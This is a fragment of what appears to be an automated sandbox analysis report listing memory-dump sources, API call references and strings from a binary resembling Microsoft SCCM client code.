                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Similarity
                                                                                          • API ID: H_prolog3H_prolog3_catch_
                                                                                          • String ID: Failed to verify %s file hash; will skip installation of this file. Error 0x%x$PackageItemDetails::ValidateItemHashes
                                                                                          • API String ID: 863784098-551186493
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch
                                                                                          • String ID: Operator %s is not valid!$RunDWORDComparison
                                                                                          • API String ID: 3886170330-3885480953
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005F715D
                                                                                          • RegQueryValueExW.ADVAPI32(?,00000064,00000000,00000000,00000001,0000001C,CCM::Utility::RegKey::GetString,0000001C,005FB057,00000064,00000001,80000002,00000000,00000000,00000000,CCM::Utility::GetCcmDirectory), ref: 005F71D4
                                                                                          Strings
                                                                                          • CCM::Utility::RegKey::GetString, xrefs: 005F7179
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catchQueryValue
                                                                                          • String ID: CCM::Utility::RegKey::GetString
                                                                                          • API String ID: 1659098252-1406425785
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0064A1C9
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • _wcsstr.LIBCMT ref: 0064A22B
                                                                                          Strings
                                                                                          • CCM::LocationServices::ValidateDistinguishedName, xrefs: 0064A1E5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: H_prolog3H_prolog3_catch__wcsstr
                                                                                          • String ID: CCM::LocationServices::ValidateDistinguishedName
                                                                                          • API String ID: 741560716-3710971154